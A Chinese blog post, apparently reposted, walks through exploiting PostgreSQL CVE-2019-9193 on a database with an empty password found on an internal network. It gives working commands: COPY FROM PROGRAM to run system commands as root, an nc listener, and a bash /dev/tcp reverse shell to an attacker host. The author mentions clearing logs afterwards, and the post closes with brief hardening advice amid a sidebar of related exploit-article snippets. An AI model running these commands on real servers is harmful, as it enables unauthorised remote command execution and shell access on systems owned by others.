postgresql 查看用户密码_PostgreSQL任意命令执行漏洞利用(CVE-2019-9193)

最新推荐文章于 2024-04-16 11:40:36 发布
最新推荐文章于 2024-04-16 11:40:36 发布
阅读量495 收藏 2
点赞数
文章标签: postgresql 查看用户密码 postgresql 远程用户

904c4fe2635050d207c89fd405ad47f7.png

最近没事曰曰内网,偶然发现了一个使用空密码的pg(是的,连爆破都省了)。用navicat连上去看了下几个库都是一些业务测试数据,没什么好收集;不死心,google了一下发现有个比较新的CVE好像可以操作一下~

漏洞概述

最近,安全研究人员披露了PostgreSQL实例代码执行漏洞(CVE-2019-9193)的漏洞细节。具有数据库 服务器 文件读取权限的攻击者可以利用此漏洞执行任意系统命令。

从9.3版本开始,Postgres新增了一个COPY TO/FROM PROGRAM功能,允许数据库的超级用户以及pg_read_server_files组中的任何用户执行操作系统命令。

受影响的版本(貌似更新版本无解)

PostgreSQL> = 9.3

漏洞利用

pg数据库连接

# 连接postgressql,虽然是内网ip但还是打一下码吧
psql -U postgres -h 172.xx.xxx.xx

cbbec7fb03c4c4ebccde1119d1607e8c.png

开始攻击(直接套用网上POC)

# 删除并创建用于保存系统命令执行结果的表 
DROP TABLE IF EXISTS cmd_exec;
CREATE TABLE cmd_exec(cmd_output text);

# 命令执行测试,多试几条
COPY cmd_exec FROM PROGRAM 'id';
COPY cmd_exec FROM PROGRAM 'whoami';

# 查看结果
SELECT * FROM cmd_exec;

14786930b9609630b7c3cbac1209ca7b.png

我的 ,还是个root用户,,都不用提权了(这安全意识阿。。。)

Getshell

虽然都可以执行系统命令了,拿不拿shell无所谓,但拿了还是要方便一些;

# attack机器上开启监听
nc -lvnp 8888

# 利用pg执行远程连接命令
COPY cmd_exec FROM PROGRAM 'bash -i >& /dev/tcp/attack_ip/8888 0>&1';

attack机器已经返回shell连接了~

d4d480a745850e6d7d5c89ebf8514139.png

记录一下,顺便清除记录收工了。

解决方案建议

1、pg_read_server_files,pg_write_server_files和pg_execute_server_program角色涉及读取和写入具有大权限的数据库服务器文件。将此角色权限分配给数据库用户时,应慎重考虑。

2、使用强密码!!!

3、进行网络隔离,只允许需要的IP连接;

PostgreSQL任意命令执行漏洞利用(CVE-2019-9193 - Tachiu Lam​tclam.cn
b9ecc199bb91682767ff8f2e770cab45.png
weixin_39539563
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
web渗透--postgresql密码破解,简单漏洞利用
朝阳似锦 晖映山河
09-12 1170
postgresql介绍 postgresql是对象基础型数据库管理系统,支持大部分SQL标准并且提供了许多其他的现代特性:复杂查询、外键、触发器、视图、事务完整性、MVCC。同样,PostgreSQL可以用许多方法扩展,比如,通过增加新的数据类型、函数、操作符、聚集函数、索引。 一般使用的是5432端口号。 https://www.postgresql.org/ 探测postgresqlkeyi nmap -sV 目标IP地址 -p 5432 探测目标postgresql版本信息。 msf下post
django_cve_2019_19844_poc:适用于CVE-2019-19844的PoC(https:www.djangoproject.comweblog2019dec18security-releases)
02-04
django_cve_2019_19844_poc PoC要求Python 3.7.x PostgreSQL 9.5或更高...cve_2019_19844_poc ) 运行pip install -r requirements.txt && ./manage.py migrate --noinput 使用shell命令创建以下用户: >> > from dj
任意命令执行
09-20 456
任意命令执行原因:   当应用需要调用一些外部程序去处理内容的情况下,就会用到一些执行系统命令的函数。如PHP中的system、exec、shell_exec等,当用户可以控制命令执行函数中的参数时,将可以注入恶意系统命令到正常命令中,造成命令执行攻击。   脚本语言(如PHP)优点是简洁、方便,但也伴随着一些问题,如速度慢、无法接触系统底层,如果我们开发的应用(特别是企业级的一些应...
运维系列(亲测有效):PostgreSQL默认密码详解(在不知道用户密码的情况下查看数据库)
最新发布
weixin_54626591的博客
04-16 4404
PostgreSQL默认密码详解
PostgreSQL任意命令执行CVE-2019-9193
GalaxySpaceX的博客
07-03 762
PostgreSQL任意命令执行CVE-2019-9193
CVECVE-2019-9193PostgreSQL 任意命令执行漏洞
边扯边淡
08-01 3266
CVECVE-2019-9193PostgreSQL任意命令执行漏洞
Postgres - 基本操作命令
TrustNature
07-14 504
一、登录 su - postgres 切换到 postgres 用户 psql -U postgres -W 使用密码登录 二、操作 查看所有用户: select * from pg_user 查看所有角色:\du 创建用户: CREATE USER pg_test_user_2; 在PostgreSQL 里没有区分用户和角色的概念,"CREATE USER" 为 "CREATE ROLE" ...
CVE-Search:CVE-Search(名称仍为字母),是一种机器学习工具,致力于检测Twitter,Github等社交网络中的漏洞利用或概念证明。 它还能够在CVE上的Google,Yandex,DuckDuckGo上进行相关搜索,并检测内容是否可能是功能漏洞,概念证明或仅仅是有关漏洞的信息
02-03
CVE-Search(名称仍为字母)是一种机器学习工具,专注于检测Twitter,Github等社交网络中的漏洞利用或概念证明。 它还能够在CVE上的Google,Yandex,DuckDuckGo上进行相关搜索,并检测内容是否可能是功能漏洞,概念...
postgresql-14.1-1-windows-x64
12-05
That has been shown to be possible with a server vulnerable to CVE-2021-23214. The PostgreSQL Project thanks Jacob Champion for reporting this problem. (CVE-2021-23222) Fix physical replication for...
go-cve-dictionary:构建CVE的本地副本(NVD和日语JVN)。 服务器模式,方便查询
05-01
go-cve-dictionary需要以下软件包。 SQLite3,MySQL,PostgreSQL或Redis 吉特 海湾合作委员会 前往v1.7.1或更高版本 这是Amazon EC2服务器的示例。 $ ssh ec2-user@52.100.100.100 -i ~ /.ssh/private.pem $ ...
security-research:安全研究
03-19
安全研究 与我的个人安全研究相关的文件集合。其他内容将发布在我的博客。 工具 工具 描述 Windows实用程序,用于检查OpenSSL库中OPENSSLDIR构建参数... CVE-2019-12571-PIA macOS任意文件覆盖 。 CVE-2019-12572-P
[转载]剖析PostgreSQLCVE-2013-1899安全漏洞
weixin_30483495的博客
05-09 236
4月1号的时候,PostgreSQL开源团队为了修复重大安全漏洞,锁定了代码库,并于4月4号发布了紧急补丁9.2.4, 9.1.9, 9.0.13, 8.4.17该漏洞允许: 远程攻击者通过构造以"-"(连字符)开头的数据库名称的连接请求,可以修改配置设置、执行任意代码或者造成拒绝服务。 攻击者造成拒绝服务场景要求攻击者能访问到PostgreSQL开放端口,无需认证。 攻击者能够执行任意代码...
CVE-20199193所谓的psql的提权漏洞
公众号shadow sock7
03-27 1242
来源:https://medium.com/greenwolf-security/authenticated-arbitrary-command-execution-on-postgresql-9-3-latest-cd18945914d5 翻译:https://nosec.org/home/detail/2368.html 描述 PostgreSQL 从9.3到最新的11.2版本默认开启,影响L...
PostgreSQL 弱口令漏洞风险
weixin_35757531的博客
12-19 758
PostgreSQL 是一种开源的关系数据库管理系统,它可以运行在各种操作系统平台上。如果 PostgreSQL 数据库用户使用了弱口令,那么这个数据库就很容易被攻击者攻破。弱口令漏洞会导致攻击者可以通过猜测或使用字典攻击来破解用户密码,从而获取数据库的访问权限。这样,攻击者就可以篡改、删除或泄露数据库中的数据,甚至可以控制数据库服务器。因此,使用强密码,并定期更换密码,是避免弱口令漏洞风险的...
漏洞复现之PostgreSQL任意命令执行CVE-2019-9193
Blood_Pupil的博客
05-09 5433
PostgreSQL任意命令执行CVE-2019-9193PostgreSQL是当下最流行的数据库系统之一,它是 Mac OSX系统下常用的数据库,但是同时也提供Windows和Linux操作系统版本 今天,我将要给大家介绍一个PostgreSQL的鲜为人知的特性,这个特性允许数据库的特定用户PostgreSQL环境中执行任意代码并且在PostgreSQL 9.3至最新版本(11.2)...
PostgreSQL 高权限命令执行漏洞CVE-2019-9193
EC_Carrot的博客
07-21 426
漏洞简介 PostgreSQLPostgreSQL组织的一套自由的对象关系型数据库管理系统。该系统支持大部分SQL标准并且提供了许多其他特性,例如外键、触发器、视图等。 PostgreSQL 9.3至11.2版本中的导入导出数据命令‘COPY TO/FROM PROGRAM’存在操作系统命令注入漏洞。攻击者可利用该漏洞获取数据库超级用户权限,从而执行任意系统命令漏洞复现 我使用的是vulhub的环境,默认账号密码为postgres/postgres 登陆PostgreSQL:psql --host y
PostgreSQL 输入验证错误漏洞CVE-2021-32027 )
淡定波的博客
05-19 2042
一、 漏洞情况说明: PostgreSQL 输入验证错误漏洞CVE-2021-32027 ) The security team typically does not test unsupported versions, but this problem is quite old. While modifying certain SQL array values, missing bounds checks let authenticated database users write arbit
web渗透测试----5、暴力破解漏洞--(3)FTP密码破解
七天
06-23 1654
FTP暴力破解
PostgreSQL数据库命令执行SQL脚本的三种方式
热门推荐
ma286388309的博客
02-17 1万+
生成环境中,出于安全性等原因,往往不提供数据库连接工具,所以对数据库的更新和升级就得通过命令行来实现。本文总结了三种命令执行sql脚本的方式。以上总结的三种方式都比较常用,可以根据自己的应用场景灵活使用。
postgresql数据库--psql、pg_dump命令密码执行sql语句
04-30
可以使用以下的方式在命令行中带密码执行pg_dump命令: 1. 在命令行中输入pg_dump命令,启动pg_dump工具。 2. 输入数据库连接信息和密码,例如:pg_dump -U username -d dbname -h hostname -p port -W。 3. 执行...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值